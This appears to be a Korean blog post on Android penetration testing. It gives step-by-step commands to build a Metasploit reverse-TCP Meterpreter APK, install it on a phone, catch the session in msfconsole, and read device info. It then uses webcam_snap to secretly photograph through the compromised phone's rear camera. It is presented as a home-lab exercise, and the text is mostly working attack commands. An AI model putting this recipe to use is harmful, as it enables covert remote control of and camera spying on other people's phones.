Android 모의해킹

 

 

Vmware Kali linux IP

 192.168.0.11 

스마트폰(안드로이드) IP

 192.168.0.6 

(공격 환경은 공유기에 Host 컴퓨터와 스마트폰이 붙어있고, Host 컴퓨터 의 Vmware 에 설치되어 있는 Kali 리눅스는 네트워크가 브릿지로 설정되어있음.)

 

 

먼저 칼리리눅스에서 아래와 같은 명령어를 실행시켜

test.apk 파일을 생성한다.

 

msfpayload android/meterpreter/reverse_tcp LHOST=[자신의 Kali리눅스 IP] LPORT=[임의의 포트] R > test.apk 

 

 

ls 명령으로 test.apk 생성을 확인한다.

 

 

그리고 해당 test.apk 파일을 테스트할 스마트폰(안드로이드)에 옮긴다.

 

 

스마트폰에서 test.apk 를 실행시켜 설치한다.

MainActivity 라는 이름의 어플이 생성된다.

 

 

msfconsole 을 실행시켜서 아래와 같이 명령어를 입력한다.

 

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost [자신의 Kali 리눅스 IP]

exploit

 

exploit 명령까지 실행시키면 아래와 같은 화면이 계속 될 것이다.

 

 

 

다음으로 스마트폰에서 MainActivity 를 실행 시킨다.

그럼 아래와 같은 화면이 뜰 것이고,

 

 

Kali 리눅스에서는 아래와 같이 다음으로 진행이 된다.

 

sysinfo 명령으로 현재 공격당하는 스마트폰의 정보 확인이 가능 하다.

 

 

이제 공격당한 스마트폰의 카메라를 이용해서 사진을 찍어 Kali 리눅스에서 보게 할 것이다.

 

아래와 같이 webcam_snap 1 명령을 실행 시키면 공격당한 스마트폰의 뒷쪽 카메라로 사진을 찍어 Kali 리눅스에 저장되는 것을 볼 수 있다.

 

 

저장이 다 끝나면 아래와 같이 찍힌 사진이 뜬다.

 

 

 

 

 

 

 

 

 

 

+ Recent posts